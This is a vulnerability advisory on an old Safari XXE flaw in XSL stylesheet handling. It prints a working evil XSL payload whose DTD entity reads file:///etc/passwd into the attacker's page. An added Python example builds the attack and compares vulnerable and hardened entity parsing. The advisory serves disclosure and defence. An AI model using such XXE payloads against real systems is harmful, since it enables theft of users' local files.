CESA-2009-006 - rev 1

[See all my vulnerabilities at http://scary.beasts.org/security]

[Blog if you want to subscribe to new findings is at http://scarybeastsecurity.blogspot.com/]

Apple Safari local file theft bug

Programs affected: Safari prior to version 4
Severity: Websites can steal files from the victim's computer
Vendor URL (copy): APPLE-SA-2009-06-08-1
Initial report: Jun 2008

Safari was vulnerable to an XXE attack against a relatively obscure area of its XML parsing. As a recap, XXE (XML eXternal Entity) attacks abuse a built-in feature of XML, the external entity declaration in a DTD, to make the parser fetch local files (or network resources) and embed their contents in the attacker's document. XXE attacks are most commonly seen server-side; this advisory describes a client-side attack against the Safari browser.

Safari's XSL stylesheet handling was vulnerable to XXE. The attacker serves an arbitrary XML file that refers (via an xml-stylesheet processing instruction) to an evil XSL resource. Because XSL is itself an XML-based format, the XSL resource can carry its own DTD; an external entity declared in that DTD and referenced from the stylesheet body makes Safari read the named local file and render its contents as part of the attacker's page, so the file has been stolen by the web site.

Here's the evil XSL resource, with the DTD declaring the external entity at the top and the template body referencing it so the file's contents appear in the rendered output:

<!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///etc/passwd"> ] >
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
Below you should see the content of a local file, stolen by this evil web page.
&ent;
</xsl:template>
</xsl:stylesheet>
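To make the mechanism concrete, here is an added example that is not part of the original advisory or of Safari's code. It builds the two attacker artifacts (the XML page with its xml-stylesheet processing instruction, and the XSL resource whose DTD declares the SYSTEM entity), then parses the stylesheet with Python's stdlib expat parser in two configurations: one that resolves external entities the way the vulnerable Safari loader did, and one that refuses them. A temporary file stands in for /etc/passwd, and expat stands in for Safari's XML parser; the names build_attack, parse_stylesheet and make_secret_file are this example's own.

```python
"""XXE via an XSL stylesheet's DTD: vulnerable vs. hardened entity handling.

Added example (not the advisory's code). Uses expat from the Python
standard library as a stand-in for the browser's XML parser.
"""
import os
import tempfile
import xml.parsers.expat as expat


def build_attack(target_url):
    """Return (page_xml, evil_xsl) for the attack described in the advisory.

    page_xml is the 'random XML file' the victim visits; its xml-stylesheet
    processing instruction points at the attacker's stylesheet. evil_xsl
    declares an external general entity in its DTD whose SYSTEM id is the
    file to steal, and references that entity from the template body.
    """
    page_xml = (
        '<?xml version="1.0"?>\n'
        '<?xml-stylesheet type="text/xsl" href="evil.xsl"?>\n'
        '<doc/>\n'
    )
    evil_xsl = (
        '<!DOCTYPE doc [ <!ENTITY ent SYSTEM "%s"> ]>\n'
        '<xsl:stylesheet version="1.0" '
        'xmlns:xsl="http://www.w3.org/1999/XSL/Transform">\n'
        '<xsl:template match="/">Stolen: &ent;</xsl:template>\n'
        '</xsl:stylesheet>\n'
    ) % target_url
    return page_xml, evil_xsl


def parse_stylesheet(xsl_text, resolve_external):
    """Parse the stylesheet and return (text, error).

    resolve_external=True mimics the vulnerable loader: SYSTEM entities are
    fetched from disk and spliced into the character data. With False the
    external entity reference is refused, so the parse aborts and no file
    content reaches the output.
    """
    parser = expat.ParserCreate()
    chunks = []
    parser.CharacterDataHandler = chunks.append

    def external_entity_ref(context, base, system_id, public_id):
        if not resolve_external:
            return 0  # 0 tells expat the reference could not be handled
        # Vulnerable path: open whatever the SYSTEM id names and parse its
        # bytes as the entity's replacement text (a child parser shares the
        # parent's handlers, so the bytes land in `chunks`).
        path = system_id[len("file://"):] if system_id.startswith("file://") else system_id
        with open(path, "rb") as fh:
            data = fh.read()
        child = parser.ExternalEntityParserCreate(context)
        child.Parse(data, True)
        return 1

    parser.ExternalEntityRefHandler = external_entity_ref
    try:
        parser.Parse(xsl_text, True)
    except expat.ExpatError as exc:
        return None, str(exc)
    return "".join(chunks), None


def make_secret_file(contents):
    """Write a constructed stand-in for /etc/passwd and return its path."""
    fh = tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False)
    with fh:
        fh.write(contents)
    return fh.name


if __name__ == "__main__":
    # Constructed sample content; a real attack would name /etc/passwd.
    secret = make_secret_file("root:x:0:0:root:/root:/bin/bash\n")
    _page, xsl = build_attack("file://" + secret)
    print(parse_stylesheet(xsl, resolve_external=True))   # file content leaks
    print(parse_stylesheet(xsl, resolve_external=False))  # parse refused
    os.unlink(secret)
```

The hardened branch is the check that matters for any client that applies an attacker-supplied stylesheet: refuse (or never register a handler for) external entity references in the stylesheet's DTD, rather than trusting that XSL input is "just a stylesheet".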


Demo page for Safari 3 / MacOS

Demo page for Safari 3 / Windows


Chris Evans